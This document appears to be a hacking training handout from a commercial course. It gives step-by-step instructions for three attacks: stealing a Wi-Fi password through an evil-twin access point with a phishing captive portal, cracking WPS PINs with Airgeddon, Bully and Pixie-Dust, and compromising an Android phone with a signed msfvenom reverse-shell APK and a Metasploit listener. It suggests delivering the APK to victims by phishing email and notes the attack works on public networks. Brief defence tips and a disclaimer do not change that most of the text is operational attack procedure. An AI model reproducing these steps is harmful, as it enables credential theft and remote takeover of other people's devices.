0. Return to Evil Twin attacks menu
---------
1. English
2. Spanish
©SAVORY MINDS COE TRAINING PLATFORM
3. French
4. Catalan
5. Portuguese
6. Russian
7. Greek
8. Italian
9. Polish
10. German
---------
*Hint* On Evil Twin attack with BeEF intergrated, in addition to obtaining keys
using sniffing techniques, you can try to control the client's browser launching
numerous attack vectors. The success of these will depend on many factors such
as the kind of client's browser and its version
---------
Step 7 Capture Network Credentials

With the attack underway, the victim should be kicked off of their network and
see our fake one as the only seemingly familiar option. Be patient, and pay
attention to the network status in the top right window. This will tell you when
a device joins the network, allowing you to see any password attempts they
make when they're routed to the captive portal.

©SAVORY MINDS COE TRAINING PLATFORM

When the victim joins your network, you'll see a flurry of activity like in the
picture below. In the top-right corner, you'll be able to see any failed password
attempts, which are checked against the handshake we gathered. This will
continue until the victim inputs the correct password, and all of their internet
requests (seen in the green text box) will fail until they do so.

©SAVORY MINDS COE TRAINING PLATFORM

When the victim caves and finally enters the correct password, the windows will
close except for the top-right window. The fake network will vanish, and the
victim will be free to connect back to their trusted wireless network.

The credentials should be displayed in the top-right Control screen, and you
should copy and paste the password into a file to save, in case the script doesn't
save the file correctly. This sometimes happens, so make sure not to forget this
step or you might lose the password you just captured.

Control

Evil Twin AP Info // BSSID: ██████████████ // Channel: 11 // ESSID:

██████████████

Online time
00:01:40

Password captured successfully:

©SAVORY MINDS COE TRAINING PLATFORM

/tmp/ag.control.sh: line 37: ${log_path}: ambiguous redirect
██████████████

The password was saved on file: [/root/evil_twin_captive_portal_password-

██████████████.██████.txt

Press [Enter] on the main script window to continue, this window will be
closed

After this, you can close the window, and close down the tool by pressing Ctrl +
C. If we get a valid credential in this step, then our attack has worked, and we've
got the Wi-Fi password by tricking the user into submitting it to our fake AP's
phishing page!

Defending Against an Evil Twin AP Attack

The best way of defending against an evil twin attack is to know about the tactic,
and know that the signs of one should make you highly suspicious. If you
abruptly lose the ability to connect to your trusted network and suddenly see an
open wireless network with the same name, these are neither a coincidence nor a
normal turn of events.

Never connect to an unknown wireless network pretending to be yours,

especially one without encryption. If you suspect your router is actually
updating, turn off your Wi-Fi and plug into the router's Ethernet directly to see
what the problem is.

©SAVORY MINDS COE TRAINING PLATFORM

 WIFI HACKING USING PIXIE DUST ATTACK

While routers updated some settings to prevent routers from being attacked via
brute-force, serious flaws still existed in the way many routers implement
encryption. In programming, it's difficult to create truly random numbers, which
is required to produce strong encryption. To do this, we use a function that starts
with a number called a "seed," which, after being passed into the function,
produces a pseudo-random number.

If you use a long or varying "seed" number, you can get the same result as a
number that's actually random, but if you use an easily guessed "seed," or even
worse ... the same one repeatedly, you create weak encryption that is easy to
break. This is exactly what router manufacturers did, giving rise to Pixie-Dust, the
second generation of WPS PIN attacks.

Download Airgeddon

First, you'll need to install Airgeddon by cloning the git repository. Open a
terminal window, and type the following to clone the repo, change directory to
the new folder, and run "airgeddon.sh" as a bash script.

git clone github.com/v1s1t0r1sh3r3/airgeddon.git

cd airgeddon
sudo bash ./airgeddon.sh

©SAVORY MINDS COE TRAINING PLATFORM

If it works, you should see an alien loading screen. Don't get too spooked, the
script will start soon.

©SAVORY MINDS COE TRAINING PLATFORM

Step 2Install Dependencies

Airgeddon will detect your OS and terminal resolution. Press return to check on
all the tools contained in the framework.

Airgeddon will do a check to see what essential tools are installed. You should
try to make sure you have a completely green board before you begin, but in
particular, you will need Bully for this attack. To install a missing repo, you have
a number of options. The easiest is to follow the format below.

apt-get install (whatever you are missing)

If that doesn't work, you can also try using Python pip to install Python modules
by typing pip3 install nameofwhatyouaremissing into a terminal window. When
all the results are a green "Ok," press return to proceed to the adapter selection.

©SAVORY MINDS COE TRAINING PLATFORM

Step 3 Select Your Wireless Network Adapter

In the next step, Airgeddon will list your network adapters. Select the one you
wish to use for the attack by typing the number next to it. You may want to
change the MAC address of your adapter with a tool like GNU MAC Changer
before doing this.

In this case, I am selecting my dual-band 2.4 and 5 GHz network card, which is
option 3.

©SAVORY MINDS COE TRAINING PLATFORM

Next, you will be dropped into the main attack screen. In this case, I will be
performing a WPS attack, so I will select option 8 and press return.

©SAVORY MINDS COE TRAINING PLATFORM

Step 4 Enable Monitor Mode

Now, you will need to put your card into monitor mode. Rather than the usual
airmon-ng commands, simply type the number 2 into the menu, and press
return.

If all goes well, your card should be put into monitor mode and change its name.
Airgeddon will keep track of the changed name, and you will be able to proceed
to the targeting menu.

Step 5 Sweep the Area for Vulnerable Targets

To find vulnerable routers, you can now turn your card to the networks in the
immediate area by selecting option 4, scan for targets. If you have a dual-band
card, you will be asked if you want to scan the 2.4 or 5 GHz spectrum, allowing
you to decide what kind of networks to target. Type Y for 5 GHz and N for 2.4
GHz.

©SAVORY MINDS COE TRAINING PLATFORM

A window should open showing you all of the vulnerable networks. Allow it to
stay open for a few scans while your card runs up and down the wireless
channels and tries to find new networks. After waiting for about a minute, exit
out of the window, or hit Ctrl + C.

You should see your Wi-Fi target data loaded into a selector screen, meaning
you're ready to load target data into an attack module!

Step 6 Load Wi-Fi Target Data into the Bully Attack Module

Now, you should see a screen which contains target data for each vulnerable
network you detected. Type the number of the network you want to target to

©SAVORY MINDS COE TRAINING PLATFORM

pass the targeting data to Airgeddon, and press return. Next, you will select
which attack module will use these values as an argument.

In my example, my WPS attack screen is now fully live and ready to fire. My
wireless card is in monitor mode, and I have selected a network by BSSID,
channel number, ESSID, and other information I pulled from my scan. Now, all I
need to do is select an attack module.

As you can see below, quite a few are offered. Depending on your wireless card,
you will have more luck with either Reaver or Bully. In this guide, we're focusing
on Bully, so type 7 to load the target data into the Bully attack module, and
press return.

©SAVORY MINDS COE TRAINING PLATFORM

The final value you will need to input is the timeout, or how long before the
program assumes the attack has failed. For now, set the value to around 55
seconds. Press return, and the attack will begin.

©SAVORY MINDS COE TRAINING PLATFORM

Step 7 Launch the Attack & Break the WPS PIN

Once you start the attack module, a window will open with red text on the
screen. If communication is successful, you will see many encrypted transactions
like the one in the image below. If you are out of range or the target isn't really
vulnerable, you will see failed transactions.

As soon as Bully has the needed data to break the PIN, it will pass it to the WPS
Pixie-Dust program.

This can happen in a matter of seconds or less, but if your connection is weak, it
may take as long as a few minutes. You should see the cracked PIN and the Wi-Fi
password appear at the bottom of the screen. That's it! You have complete access
to the router.

If you write down the PIN, you can use the "custom PIN association" module to
be able to get the new password any time it's changed until the target buys a
new router or disables WPS. This also works if you just got the PIN but didn't get
the router to dump the Wi-Fi credentials.

©SAVORY MINDS COE TRAINING PLATFORM

Defending Against WPS-Pixie Based Attacks

The best and most obvious solution to pulling the plug on a Pixie-Dust attack is
to disable the nebulously useful feature at the heart of the issue — Wi-Fi
Protected Setup. You can easily reset your router with the reset button located
on virtually all routers, meaning pretty much no one will be sad if you disable
the WPS feature. You can do this through the administration page of most
routers.

Another important piece of information is that older routers may say they have
disabled the WPS option when, in fact, they are still vulnerable to this attack
even with this setting supposedly "off." This is a serious issue for older hardware,
and if you test this tool against an older router with the WPS set to "off" and the
attack succeeds, your only option may be simply replacing the hardware and
buying a new router.

WPS-Based Attacks Continue to Evolve

Hardware-based attacks are a brilliant way of bypassing a strong password, and

sustained interest in this attack vector continues to fuel the cat-and-mouse game
between router manufacturers, ISPs, and the hackers trying to break into these
devices. Learning the history of Reaver and the evolution to WPS Pixie-Dust-

©SAVORY MINDS COE TRAINING PLATFORM

based attacks will keep you on the bleeding edge of Wi-Fi hacking and expand
your hacking toolkit to enable you to take on any router with vulnerable WPS
enabled.

©SAVORY MINDS COE TRAINING PLATFORM

 Android Hacking:
Step 1: Starting Kali Linux

• From your Virtual Box, start Kali Linux and log in with root/toor (user
ID/password)
• Open a terminal prompt and make an exploit for the Android emulator
using the MSFvenom tool

Before we start, let’s talk about MSFvenom. It is a combination of MSFpayload

and MSFencode. These tools are extremely useful for generating payloads in
various formats and encoding these payloads using various encoder modules.

Merging these two tools into a single tool just makes sense. It standardizes the
command-line options, speeds things up a bit by using a single framework
instance and handles all possible output formats. MSFvenom is used to make a
payload to penetrate the Android emulator.

By using MSFvenom, we create a payload .apk file. For this, we use the
following command:

Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost

IP LPORT=LocalPort R > android_shell.apk

Figure 1: MSFvenom payload

• -p — Payload to be used
• LHOST — Localhost IP to receive a back connection (Check yours with
ifconfig command)
• LPORT — Localhost port on which the connection listen for the victim (we
set it to 4444)
• R — Raw format (we select .apk)
• Location — To save the file

©SAVORY MINDS COE TRAINING PLATFORM

Note: In this command, we have used the local address because we are
demonstrating in the local environment. To perform in the public network, you
should enter your public address in LHOST and enable port forwarding on the
router.

After this command, now you can locate your file on the desktop with the name
android_shell.apk.

Figure 2: APK file created successfully

After we successfully created the .apk file, we need to sign a certificate because
Android mobile devices are not allowed to install apps without the appropriately
signed certificate. Android devices only install signed .apk files.

We need to sign the .apk file manually in Kali Linux using:

• Keytool (preinstalled)
• jar signer (preinstalled)
• zipalign (need to install)

To sign the .apk file locally, use these commands:

Use My Patented Code that I have shown in the Workshop.

Figure 3: Keytool making keystore

Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore

key.keystore android_shell.apk hacked

©SAVORY MINDS COE TRAINING PLATFORM

Figure 4: Signing a .apk file with JARsigner

Terminal: jarsigner -verify -verbose -certs android_shell.apk

Figure 5: Verifying the .apk using JARsigner

Zipalign is not preinstalled in Kali Linux, so you will have to install it first.

Figure 6: Installing Zipalign

Terminal: zipalign -v 4 android_shell.apk singed_jar.apk

Figure 7: Verifying the .apk into a new file using Zipalign

Now we have signed our android_shell.apk file successfully and it can be run on
any Android environment. Our new filename is singed_jar.apk after the
verification with Zipalign.

©SAVORY MINDS COE TRAINING PLATFORM

Figure 8: Malicious .apk file ready to install

Step 2: is to set up the listener on the Kali Linux machine with multi/handler
payload using Metasploit.

Terminal: msfconsole

©SAVORY MINDS COE TRAINING PLATFORM

Figure 9: Starting Metasploit

Metasploit begins with the console.

Figure 10: Display Metasploit start screen

Now launch the exploit multi/handler and use the Android payload to listen to
the clients.

Terminal: use exploit/multi/handler

Figure 11: Setting up the exploit

©SAVORY MINDS COE TRAINING PLATFORM
Next, set the options for payload, listener IP (LHOST) and listener
PORT(LPORT). We have used localhost IP, port number 4444 and payload
android/meterpreter/reverse_tcp while creating an .apk file with MSFvenom.

Figure 12: Setting up the exploit

Then we can successfully run the exploit to listen for the reverse connection.

Terminal: run

©SAVORY MINDS COE TRAINING PLATFORM

Figure 13: Executing the exploit

Next, we need to install the malicious Android .apk file to the victim mobile
device. In our environment, we are using an Android device version 8.1 (Oreo).
Attacker can share a malicious Android .apk to the victim with the help of social
engineering/email phishing.

Now it is time to quickly set up the Android emulator (if you don’t have an
Android device).

Steps to configure the Android emulator:

• Download the image file for the Android x86 code project from the
Google Code projects site (https://code.google.com/archive/p/android-
x86/downloads)

©SAVORY MINDS COE TRAINING PLATFORM

 • Create a virtual machine using another version 2.6x kernel in the VMware
workstation
• Mount the ISO file into VMware options
• Finish the process and run the machine in LIVE mode
• Set up the Android device
• Set up the Google account

Note: Android x86 project can connect it to a local network with an Ethernet
adapter (VMnet8). If you are using another emulator to penetrate the Android
device, you can also use a CLI Android emulator.

After setting up the Android emulator in VM, we are going to download the file
from cloud link we have created on Kali Linux and emailed to the victim
account.

Figure 14: Spam email

Download the singed_jar.apk file and install it with “unknown resources

allowed” on the Android device.

©SAVORY MINDS COE TRAINING PLATFORM

©SAVORY MINDS COE TRAINING PLATFORM
Figure 15: Downloaded the file into an Android device

Then run and install the .apk file.

©SAVORY MINDS COE TRAINING PLATFORM

©SAVORY MINDS COE TRAINING PLATFORM
Figure 16: Installing the application into an Android device

After complete installation, we are going back to the Kali machine and start the
Meterpreter session.

Move back to Kali Linux

We already started the multi/handler exploit to listen on port 4444 and local IP
address. Open up the multi/handler terminal.

Figure 17: Successfully got the Meterpreter session

Bingo! We got the Meterpreter session of the Android device. We can check
more details with the sysinfo command, as mentioned in the below screenshot.

Figure 18: Display system details

There are lots of commands available in Meterpreter. By using the “?” help
command, you will see more options that we can perform with an Android
device. We have successfully penetrated the Android device using Kali Linux and
penetration testing tools.

You can also perform this attack on the public network, using a public IP address
and a port-forwarding router.

Let’s quickly look at some tips which prevent these types of attack.

• Don’t allow downloading any apps from cloud websites

• Don’t install apps with an unknown resources enabled option
• Use antivirus in a mobile device

©SAVORY MINDS COE TRAINING PLATFORM

 • Don’t click any random links
• Never download an unwanted .doc, PDF or .apk file from unknown
source
• Always confirm with the source of the file to be doubly sure.

Always Use These all Modules for Educational Purpose Only.

Our COE Training Platform does not bear any kind of responsibility for the
illegal actions.

Thank You.

For More Info

Visit www.savoryminds.com

Or Contact 93984 94393 (Business Whatsapp)

Or Mail:

[email protected]

[email protected]

[email protected]

©SAVORY MINDS COE TRAINING PLATFORM